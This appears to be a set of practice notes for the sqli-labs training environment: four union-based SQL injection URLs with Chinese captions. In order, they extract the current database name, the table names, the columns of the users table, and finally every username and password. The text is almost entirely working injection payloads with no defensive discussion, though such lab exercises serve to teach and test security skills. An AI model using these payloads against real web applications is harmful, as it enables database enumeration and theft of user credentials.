http://sqli/less-1/?id=0 union select 111,222,database() -- -
爆当前使用的数据库名
http://sqli/less-1/?id=0 union select 111,222,group_concat(table_name) from information_schema.tables where table_schema = 'security' -- -
爆数据库的表名
http://sqli/less-1/?id=0 union select 111,222,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users' -- -
爆users表中的字段信息
http://sqli/Less-2/?id=0 union select 111,group_concat(username),group_concat(password) from security.users -- -
爆users表中的信息